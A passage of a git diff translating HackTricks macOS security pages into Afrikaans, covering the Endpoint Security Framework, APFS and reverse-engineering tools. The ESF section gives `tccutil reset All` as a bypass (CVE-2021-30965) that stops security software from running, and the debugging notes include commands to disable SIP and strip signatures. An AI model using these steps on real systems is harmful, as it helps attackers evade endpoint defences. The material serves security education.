Dit kan netwerkdata op pakkievlak monitor of wysig. +* **DNS Proxy**: Dit word gebruik om 'n aangepaste DNS-verskaffer te skep. Dit kan gebruik word om DNS-versoeke en -antwoorde te monitor of wysig. -## Endpoint Security Framework +## Eindpuntsekuriteitsraamwerk -Endpoint Security is a framework provided by Apple in macOS that provides a set of APIs for system security. It's intended for use by **security vendors and developers to build products that can monitor and control system activity** to identify and protect against malicious activity. +Eindpuntsekuriteit is 'n raamwerk wat deur Apple in macOS voorsien word en 'n stel API's bied vir stelselsekuriteit. Dit is bedoel vir gebruik deur **sekuriteitsvennote en ontwikkelaars om produkte te bou wat stelselaktiwiteit kan monitor en beheer** om kwaadwillige aktiwiteit te identifiseer en te beskerm daarteen. -This framework provides a **collection of APIs to monitor and control system activity**, such as process executions, file system events, network and kernel events. +Hierdie raamwerk bied 'n **versameling API's om stelselaktiwiteit te monitor en te beheer**, soos prosesuitvoerings, lêersisteemgebeure, netwerk- en kerngebeure. -The core of this framework is implemented in the kernel, as a Kernel Extension (KEXT) located at **`/System/Library/Extensions/EndpointSecurity.kext`**. This KEXT is made up of several key components: +Die kern van hierdie raamwerk word geïmplementeer in die kern as 'n Kernel-uitbreiding (KEXT) wat geleë is by **`/System/Library/Extensions/EndpointSecurity.kext`**. Hierdie KEXT bestaan uit verskeie sleutelkomponente: -* **EndpointSecurityDriver**: This acts as the "entry point" for the kernel extension. It's the main point of interaction between the OS and the Endpoint Security framework. -* **EndpointSecurityEventManager**: This component is responsible for implementing kernel hooks. Kernel hooks allow the framework to monitor system events by intercepting system calls. -* **EndpointSecurityClientManager**: This manages the communication with user space clients, keeping track of which clients are connected and need to receive event notifications. -* **EndpointSecurityMessageManager**: This sends messages and event notifications to user space clients. +* **EndpointSecurityDriver**: Dit tree op as die "toegangspunt" vir die kernuitbreiding. Dit is die hoofpunt van interaksie tussen die bedryfstelsel en die Eindpuntsekuriteitsraamwerk. +* **EndpointSecurityEventManager**: Hierdie komponent is verantwoordelik vir die implementering van kernhake. Kernhake maak dit moontlik vir die raamwerk om stelselgebeure te monitor deur stelseloproepe te onderskep. +* **EndpointSecurityClientManager**: Dit bestuur die kommunikasie met kliënte in gebruikersruimte, hou by watter kliënte gekoppel is en kennis moet neem van gebeurteniskennisgewings. +* **EndpointSecurityMessageManager**: Dit stuur boodskappe en gebeurteniskennisgewings na kliënte in gebruikersruimte. -The events that the Endpoint Security framework can monitor are categorized into: +Die gebeure wat die Eindpuntsekuriteitsraamwerk kan monitor, word gekategoriseer as: -* File events -* Process events -* Socket events -* Kernel events (such as loading/unloading a kernel extension or opening an I/O Kit device) +* Lêergebeure +* Prosessgebeure +* Sokketgebeure +* Kerngebeure (soos die laai/ontlaai van 'n kernuitbreiding of die oopmaak van 'n I/O Kit-toestel) -### Endpoint Security Framework Architecture +### Eindpuntsekuriteitsraamwerkargitektuur
https://www.youtube.com/watch?v=jaVkpM1UqOs
-**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller: +**Kommunikasie in gebruikersruimte** met die Eindpuntsekuriteitsraamwerk vind plaas deur die IOUserClient-klas. Twee verskillende subklasse word gebruik, afhangende van die tipe oproeper: -* **EndpointSecurityDriverClient**: This requires the `com.apple.private.endpoint-security.manager` entitlement, which is only held by the system process `endpointsecurityd`. -* **EndpointSecurityExternalClient**: This requires the `com.apple.developer.endpoint-security.client` entitlement. This would typically be used by third-party security software that needs to interact with the Endpoint Security framework. +* **EndpointSecurityDriverClient**: Dit vereis die `com.apple.private.endpoint-security.manager`-bevoegdheid, wat slegs deur die stelselproses `endpointsecurityd` besit word. +* **EndpointSecurityExternalClient**: Dit vereis die `com.apple.developer.endpoint-security.client`-bevoegdheid. Dit word tipies deur derdeparty-sekuriteitsagteware gebruik wat met die Eindpuntsekuriteitsraamwerk moet kommunikeer. -The Endpoint Security Extensions:**`libEndpointSecurity.dylib`** is the C library that system extensions use to communicate with the kernel. This library uses the I/O Kit (`IOKit`) to communicate with the Endpoint Security KEXT. +Die Eindpuntsekuriteitsuitbreidings:**`libEndpointSecurity.dylib`** is die C-biblioteek wat stelseluitbreidings gebruik om met die kern te kommunikeer. Hierdie biblioteek gebruik die I/O Kit (`IOKit`) om met die Eindpuntsekuriteits-KEXT te kommunikeer. -**`endpointsecurityd`** is a key system daemon involved in managing and launching endpoint security system extensions, particularly during the early boot process. **Only system extensions** marked with **`NSEndpointSecurityEarlyBoot`** in their `Info.plist` file receive this early boot treatment. +**`endpointsecurityd`** is 'n belangrike stelseldaemon wat betrokke is by die bestuur en aanstuur van eindpuntsekuriteitstelseluitbreidings, veral gedurende die vroeë opstartproses. Slegs stelseluitbreidings wat in hul `Info.plist`-lêer gemerk is met **`NSEndpointSecurityEarlyBoot`** ontvang hierdie vroeë opstartbehandeling. -Another system daemon, **`sysextd`**, **validates system extensions** and moves them into the proper system locations. It then asks the relevant daemon to load the extension. The **`SystemExtensions.framework`** is responsible for activating and deactivating system extensions. +'n Ander stelseldaemon, **`sysextd`**, **valideer stelseluitbreidings** en skuif hulle na die korrekte stelselposisies. Dit vra dan die relevante daemon om die uitbreiding te laai. Die **`SystemExtensions.framework`** is verantwoordelik vir die aktivering en deaktivering van stelseluitbreidings. -## Bypassing ESF +## Om ESF te omseil -ESF is used by security tools that will try to detect a red teamer, so any information about how this could be avoided sounds interesting. +ESF word deur sekuriteitsgereedskap gebruik wat sal probeer om 'n rooi-spanlid op te spoor, dus enige inligting oor hoe dit vermy kan word, klink interessant. ### CVE-2021-30965 -The thing is that the security application needs to have **Full Disk Access permissions**. So if an attacker could remove that, he could prevent the software from running: - +Die ding is dat die sekuriteitsprogram **Volle Skyskryftoegang-bevoegdhede** moet hê. As 'n aanvaller dit kan verwyder, kan hy voorkom dat die sagteware loop: ```bash tccutil reset All ``` +Vir **meer inligting** oor hierdie omseiling en verwante omseilings, kyk na die praatjie [#OBTS v5.0: "The Achilles Heel of EndpointSecurity" - Fitzl Csaba](https://www.youtube.com/watch?v=lQO7tvNCoTI) -For **more information** about this bypass and related ones check the talk [#OBTS v5.0: "The Achilles Heel of EndpointSecurity" - Fitzl Csaba](https://www.youtube.com/watch?v=lQO7tvNCoTI) +Aan die einde is dit reggestel deur die nuwe toestemming **`kTCCServiceEndpointSecurityClient`** aan die sekuriteitsprogram wat deur **`tccd`** bestuur word te gee, sodat `tccutil` nie sy toestemmings sal skoonmaak en dit sal verhoed om uit te voer nie. -At the end this was fixed by giving the new permission **`kTCCServiceEndpointSecurityClient`** to the security app managed by **`tccd`** so `tccutil` won't clear its permissions preventing it from running. - -## References +## Verwysings * [**OBTS v3.0: "Endpoint Security & Insecurity" - Scott Knight**](https://www.youtube.com/watch?v=jaVkpM1UqOs) * [**https://knight.sc/reverse%20engineering/2019/08/24/system-extension-internals.html**](https://knight.sc/reverse%20engineering/2019/08/24/system-extension-internals.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md b/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md index a738a6671..e88907f48 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md @@ -2,43 +2,40 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Apple Propietary File System (APFS) +## Apple Propietary-lêersisteem (APFS) -**Apple File System (APFS)** is a modern file system designed to supersede the Hierarchical File System Plus (HFS+). Its development was driven by the need for **improved performance, security, and efficiency**. +**Apple-lêersisteem (APFS)** is 'n moderne lêersisteem wat ontwerp is om die Hierargiese Lêersisteem Plus (HFS+) te vervang. Die ontwikkeling daarvan is gedryf deur die behoefte aan **verbeterde prestasie, sekuriteit en doeltreffendheid**. -Some notable features of APFS include: +Enkele noemenswaardige kenmerke van APFS sluit in: -1. **Space Sharing**: APFS allows multiple volumes to **share the same underlying free storage** on a single physical device. This enables more efficient space utilization as the volumes can dynamically grow and shrink without the need for manual resizing or repartitioning. - 1. This means, compared with traditional partitions in file disks, **that in APFS different partitions (volumes) shares all the disk space**, while a regular partition usually had a fixed size. -2. **Snapshots**: APFS supports **creating snapshots**, which are **read-only**, point-in-time instances of the file system. Snapshots enable efficient backups and easy system rollbacks, as they consume minimal additional storage and can be quickly created or reverted. -3. **Clones**: APFS can **create file or directory clones that share the same storage** as the original until either the clone or the original file is modified. This feature provides an efficient way to create copies of files or directories without duplicating the storage space. -4. **Encryption**: APFS **natively supports full-disk encryption** as well as per-file and per-directory encryption, enhancing data security across different use cases. -5. **Crash Protection**: APFS uses a **copy-on-write metadata scheme that ensures file system consistency** even in cases of sudden power loss or system crashes, reducing the risk of data corruption. - -Overall, APFS offers a more modern, flexible, and efficient file system for Apple devices, with a focus on improved performance, reliability, and security. +1. **Spasie-deling**: APFS maak dit moontlik dat verskeie volumes die **gelyke onderliggende vry stoorplek** op 'n enkele fisiese toestel deel. Dit maak doeltreffender spasiebenutting moontlik, aangesien die volumes dinamies kan groei en krimp sonder die nodigheid van handmatige vergroting of herverdeling. +1. Dit beteken, in vergelyking met tradisionele partisies in lêerdiske, **dat in APFS verskillende partisies (volumes) al die skyfspasie deel**, terwyl 'n gewone partisie gewoonlik 'n vaste grootte gehad het. +2. **Momentopnames**: APFS ondersteun die **skep van momentopnames**, wat **alleen-lees**, punt-in-tyd instansies van die lêersisteem is. Momentopnames maak doeltreffende rugsteun en maklike stelselherstel moontlik, aangesien hulle minimaal bykomende stoorplek gebruik en vinnig geskep of teruggesit kan word. +3. **Klone**: APFS kan **lêer- of gidsklone skep wat dieselfde stoorplek as die oorspronklike deel** totdat óf die kloon óf die oorspronklike lêer gewysig word. Hierdie kenmerk bied 'n doeltreffende manier om kopieë van lêers of gidse te skep sonder om die stoorplek te dupliseer. +4. **Versleuteling**: APFS ondersteun **volledige skyfversleuteling** asook per-lêer en per-gids versleuteling, wat data-sekuriteit in verskillende gevalle verbeter. +5. **Kragonderbrekingbeskerming**: APFS gebruik 'n **kopie-op-skryf metadata-skema wat verseker dat die lêersisteem konsistent bly**, selfs in gevalle van skielike kragonderbreking of stelselonderbrekings, wat die risiko van datakorrupsie verminder. +Oor die algemeen bied APFS 'n meer moderne, buigsame en doeltreffende lêersisteem vir Apple-toestelle, met die fokus op verbeterde prestasie, betroubaarheid en sekuriteit. ```bash diskutil list # Get overview of the APFS volumes ``` - ## Firmlinks -The `Data` volume is mounted in **`/System/Volumes/Data`** (you can check this with `diskutil apfs list`). - -The list of firmlinks can be found in the **`/usr/share/firmlinks`** file. +Die `Data` volume is gemonteer in **`/System/Volumes/Data`** (jy kan dit nagaan met `diskutil apfs list`). +Die lys van firmlinks kan gevind word in die **`/usr/share/firmlinks`** lêer. ```bash cat /usr/share/firmlinks /AppleInternal AppleInternal @@ -46,19 +43,18 @@ cat /usr/share/firmlinks /Library Library [...] ``` - -On the **left**, there is the directory path on the **System volume**, and on the **right**, the directory path where it maps on the **Data volume**. So, `/library` --> `/system/Volumes/data/library` +Aan die **linkerkant** is die gidspad op die **Stelselvolume**, en aan die **regterkant** is die gidspad waar dit op die **Datavolume** afbeeld. So, `/library` --> `/system/Volumes/data/library`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md index 904163ae6..21c603875 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md @@ -1,28 +1,26 @@ -# macOS Apps - Inspecting, debugging and Fuzzing +# macOS-toepassings - Inspekteer, foutopsporing en Fuzzing
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Static Analysis +## Statische Analise ### otool - ```bash otool -L /bin/ls #List dynamically linked libraries otool -tv /bin/ps #Decompile application ``` - ### objdump {% code overflow="wrap" %} @@ -38,8 +36,7 @@ objdump --disassemble-symbols=_hello --x86-asm-syntax=intel toolsdemo #Disassemb ### jtool2 -The tool can be used as a **replacement** for **codesign**, **otool**, and **objdump**, and provides a few additional features. [**Download it here**](http://www.newosxbook.com/tools/jtool.html) or install it with `brew`. - +Die instrument kan gebruik word as 'n **vervanging** vir **codesign**, **otool**, en **objdump**, en bied 'n paar ekstra kenmerke. [**Laai dit hier af**](http://www.newosxbook.com/tools/jtool.html) of installeer dit met `brew`. ```bash # Install brew install --cask jtool2 @@ -56,13 +53,11 @@ ARCH=x86_64 jtool2 --sig /System/Applications/Automator.app/Contents/MacOS/Autom # Get MIG information jtool2 -d __DATA.__const myipc_server | grep MIG ``` - ### Codesign / ldid {% hint style="danger" %} -**`Codesign`** can be found in **macOS** while **`ldid`** can be found in **iOS** +**`Codesign`** kan gevind word in **macOS** terwyl **`ldid`** gevind kan word in **iOS** {% endhint %} - ```bash # Get signer codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" @@ -89,86 +84,78 @@ ldid -e ## /tmp/entl.xml is a XML file with the new entitlements to add ldid -S/tmp/entl.xml ``` +### VerdagtePakket -### SuspiciousPackage - -[**SuspiciousPackage**](https://mothersruin.com/software/SuspiciousPackage/get.html) is a tool useful to inspect **.pkg** files (installers) and see what is inside before installing it.\ -These installers have `preinstall` and `postinstall` bash scripts that malware authors usually abuse to **persist** **the** **malware**. +[**VerdagtePakket**](https://mothersruin.com/software/SuspiciousPackage/get.html) is 'n nuttige hulpmiddel om **.pkg** lêers (installeerders) te ondersoek en te sien wat binne-in is voordat dit geïnstalleer word.\ +Hierdie installeerders het `preinstall` en `postinstall` bash-skripte wat malware-skrywers gewoonlik misbruik om die malware te **volhard**. ### hdiutil -This tool allows to **mount** Apple disk images (**.dmg**) files to inspect them before running anything: - +Hierdie hulpmiddel maak dit moontlik om Apple-diskbeeldlêers (**.dmg**) te **monteer** om dit te ondersoek voordat enige iets uitgevoer word: ```bash hdiutil attach ~/Downloads/Firefox\ 58.0.2.dmg ``` - -It will be mounted in `/Volumes` +Dit sal in `/Volumes` gemonteer word. ### Objective-C #### Metadata {% hint style="danger" %} -Note that programs written in Objective-C **retain** their class declarations **when** **compiled** into [Mach-O binaries](../macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md). Such class declarations **include** the name and type of: +Let daarop dat programme wat in Objective-C geskryf is, hul klassedeclarasies behou wanneer hulle gekompileer word in [Mach-O-binêre](../macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md). Sulke klassedeclarasies sluit die naam en tipe van die volgende in: {% endhint %} -* The class -* The class methods -* The class instance variables - -You can get this information using [**class-dump**](https://github.com/nygard/class-dump): +* Die klas +* Die klasmetodes +* Die klasinstansie-variables +Jy kan hierdie inligting kry deur [**class-dump**](https://github.com/nygard/class-dump) te gebruik: ```bash class-dump Kindle.app ``` +Let wel, hierdie name kan versteek word om die omkeer van die binêre kode moeiliker te maak. -Note that this names could be obfuscated to make the reversing of the binary more difficult. +#### Funksie-oproep -#### Function calling - -When a function is called in a binary that uses objective-C, the compiled code instead of calling that function, it will call **`objc_msgSend`**. Which will be calling the final function: +Wanneer 'n funksie in 'n binêre kode geroep word wat Objective-C gebruik, sal die gekompileerde kode in plaas daarvan die funksie **`objc_msgSend`** oproep. Dit sal die finale funksie oproep: ![](<../../../.gitbook/assets/image (560).png>) -The params this function expects are: +Die parameters wat hierdie funksie verwag, is: -* The first parameter (**self**) is "a pointer that points to the **instance of the class that is to receive the message**". Or more simply put, it’s the object that the method is being invoked upon. If the method is a class method, this will be an instance of the class object (as a whole), whereas for an instance method, self will point to an instantiated instance of the class as an object. -* The second parameter, (**op**), is "the selector of the method that handles the message". Again, more simply put, this is just the **name of the method.** -* The remaining parameters are any **values that are required by the method** (op). +* Die eerste parameter (**self**) is " 'n wyser wat wys na die **instansie van die klas wat die boodskap moet ontvang** ". Of eenvoudig gestel, dit is die objek waarop die metode aangeroep word. As die metode 'n klasmetode is, sal dit 'n instansie van die klasobjek (as geheel) wees, terwyl dit vir 'n instansiemetode sal wys na 'n geïnstantieerde instansie van die klas as 'n objek. +* Die tweede parameter (**op**) is "die selekteerder van die metode wat die boodskap hanteer". Weereens, eenvoudig gestel, is dit net die **naam van die metode**. +* Die oorblywende parameters is enige **waardes wat deur die metode vereis word** (op). -| **Argument** | **Register** | **(for) objc\_msgSend** | +| **Argument** | **Register** | **(vir) objc\_msgSend** | | ----------------- | --------------------------------------------------------------- | ------------------------------------------------------ | -| **1st argument** | **rdi** | **self: object that the method is being invoked upon** | -| **2nd argument** | **rsi** | **op: name of the method** | -| **3rd argument** | **rdx** | **1st argument to the method** | -| **4th argument** | **rcx** | **2nd argument to the method** | -| **5th argument** | **r8** | **3rd argument to the method** | -| **6th argument** | **r9** | **4th argument to the method** | -| **7th+ argument** |

rsp+
(on the stack)

| **5th+ argument to the method** | +| **1ste argument** | **rdi** | **self: objek waarop die metode aangeroep word** | +| **2de argument** | **rsi** | **op: naam van die metode** | +| **3de argument** | **rdx** | **1ste argument van die metode** | +| **4de argument** | **rcx** | **2de argument van die metode** | +| **5de argument** | **r8** | **3de argument van die metode** | +| **6de argument** | **r9** | **4de argument van die metode** | +| **7de+ argument** |

rsp+
(op die stapel)

| **5de+ argument van die metode** | ### Swift -With Swift binaries, since there is Objective-C compatibility, sometimes you can extract declarations using [class-dump](https://github.com/nygard/class-dump/) but not always. - -With the **`jtool -l`** or **`otool -l`** command lines it's possible ti find several sections that start with **`__swift5`** prefix: +Met Swift-binêre lêers, aangesien daar Objective-C-verenigbaarheid is, kan jy soms verklarings onttrek deur [class-dump](https://github.com/nygard/class-dump/) te gebruik, maar nie altyd nie. +Met die **`jtool -l`** of **`otool -l`** opdraglyne is dit moontlik om verskeie afdelings te vind wat begin met die voorvoegsel **`__swift5`**: ```bash jtool2 -l /Applications/Stocks.app/Contents/MacOS/Stocks LC 00: LC_SEGMENT_64 Mem: 0x000000000-0x100000000 __PAGEZERO LC 01: LC_SEGMENT_64 Mem: 0x100000000-0x100028000 __TEXT - [...] - Mem: 0x100026630-0x100026d54 __TEXT.__swift5_typeref - Mem: 0x100026d60-0x100027061 __TEXT.__swift5_reflstr - Mem: 0x100027064-0x1000274cc __TEXT.__swift5_fieldmd - Mem: 0x1000274cc-0x100027608 __TEXT.__swift5_capture - [...] +[...] +Mem: 0x100026630-0x100026d54 __TEXT.__swift5_typeref +Mem: 0x100026d60-0x100027061 __TEXT.__swift5_reflstr +Mem: 0x100027064-0x1000274cc __TEXT.__swift5_fieldmd +Mem: 0x1000274cc-0x100027608 __TEXT.__swift5_capture +[...] ``` +Jy kan verdere inligting oor die **inligting wat in hierdie afdeling gestoor word in hierdie blogpos** vind (https://knight.sc/reverse%20engineering/2019/07/17/swift-metadata.html). -You can find further information about the [**information stored in these section in this blog post**](https://knight.sc/reverse%20engineering/2019/07/17/swift-metadata.html). - -Moreover, **Swift binaries might have symbols** (for example libraries need to store symbols so its functions can be called). The **symbols usually have the info about the function name** and attr in a ugly way, so they are very useful and there are "**demanglers"** that can get the original name: - +Verder, **Swift binaêre lêers kan simbole hê** (byvoorbeeld biblioteke moet simbole stoor sodat sy funksies geroep kan word). Die **simbole het gewoonlik die inligting oor die funksienaam** en attr op 'n lelike manier, so hulle is baie nuttig en daar is "**demanglers"** wat die oorspronklike naam kan kry: ```bash # Ghidra plugin https://github.com/ghidraninja/ghidra_scripts/blob/master/swift_demangler.py @@ -176,94 +163,140 @@ https://github.com/ghidraninja/ghidra_scripts/blob/master/swift_demangler.py # Swift cli swift demangle ``` +### Gepakte binaire lêers -### Packed binaries +* Kontroleer vir hoë entropie +* Kontroleer die strings (as daar byna geen verstaanbare string is nie, is dit gepak) +* Die UPX-pakker vir MacOS genereer 'n afdeling genaamd "\_\_XHDR" -* Check for high entropy -* Check the strings (is there is almost no understandable string, packed) -* The UPX packer for MacOS generates a section called "\_\_XHDR" - -## Dynamic Analysis +## Dinamiese Analise {% hint style="warning" %} -Note that in order to debug binaries, **SIP needs to be disabled** (`csrutil disable` or `csrutil enable --without debug`) or to copy the binaries to a temporary folder and **remove the signature** with `codesign --remove-signature ` or allow the debugging of the binary (you can use [this script](https://gist.github.com/carlospolop/a66b8d72bb8f43913c4b5ae45672578b)) +Let daarop dat om binaire lêers te ontleed, **SIP gedeaktiveer moet word** (`csrutil disable` of `csrutil enable --without debug`) of om die binaire lêers na 'n tydelike vouer te kopieer en die handtekening met `codesign --remove-signature ` te verwyder of om die ontleed van die binaire lêer toe te laat (jy kan [hierdie skripsie](https://gist.github.com/carlospolop/a66b8d72bb8f43913c4b5ae45672578b) gebruik) {% endhint %} {% hint style="warning" %} -Note that in order to **instrument system binaries**, (such as `cloudconfigurationd`) on macOS, **SIP must be disabled** (just removing the signature won't work). +Let daarop dat om **sisteem-binaire lêers** (soos `cloudconfigurationd`) op macOS te **instrumenteer**, moet SIP gedeaktiveer word (net die handtekening verwyder sal nie werk nie). {% endhint %} -### Unified Logs +### Vereenigde Logboeke -MacOS generates a lot of logs that can be very useful when running an application trying to understand **what is it doing**. +MacOS genereer baie logboeke wat baie nuttig kan wees wanneer 'n toepassing uitgevoer word om te probeer verstaan **wat dit doen**. -Moreover, the are some logs that will contain the tag `` to **hide** some **user** or **computer** **identifiable** information. However, it's possible to **install a certificate to disclose this information**. Follow the explanations from [**here**](https://superuser.com/questions/1532031/how-to-show-private-data-in-macos-unified-log). +Daar is ook logboeke wat die etiket `` bevat om sekere **gebruikers-** of **rekenaaridentifiseerbare** inligting te **versteek**. Dit is egter moontlik om 'n sertifikaat te installeer om hierdie inligting bekend te maak. Volg die verduidelikings vanaf [**hierdie skakel**](https://superuser.com/questions/1532031/how-to-show-private-data-in-macos-unified-log). ### Hopper -#### Left panel +#### Linker paneel -In the left panel of hopper it's possible to see the symbols (**Labels**) of the binary, the list of procedures and functions (**Proc**) and the strings (**Str**). Those aren't all the strings but the ones defined in several parts of the Mac-O file (like _cstring or_ `objc_methname`). +In die linker paneel van Hopper is dit moontlik om die simbole (**Etikette**) van die binaire lêer, die lys van prosedures en funksies (**Proc**) en die strings (**Str**) te sien. Dit is nie al die strings nie, maar diegene wat in verskeie dele van die Mac-O-lêer gedefinieer is (soos _cstring of_ `objc_methname`). -#### Middle panel +#### Middelste paneel -In the middle panel you can see the **dissasembled code**. And you can see it a **raw** disassemble, as **graph**, as **decompiled** and as **binary** by clicking on the respective icon: +In die middelste paneel kan jy die **ontleedde kode** sien. En jy kan dit sien as 'n **rof** ontleed, as 'n **grafiek**, as **ontsommel** en as **binêr** deur op die betrokke ikoon te klik:
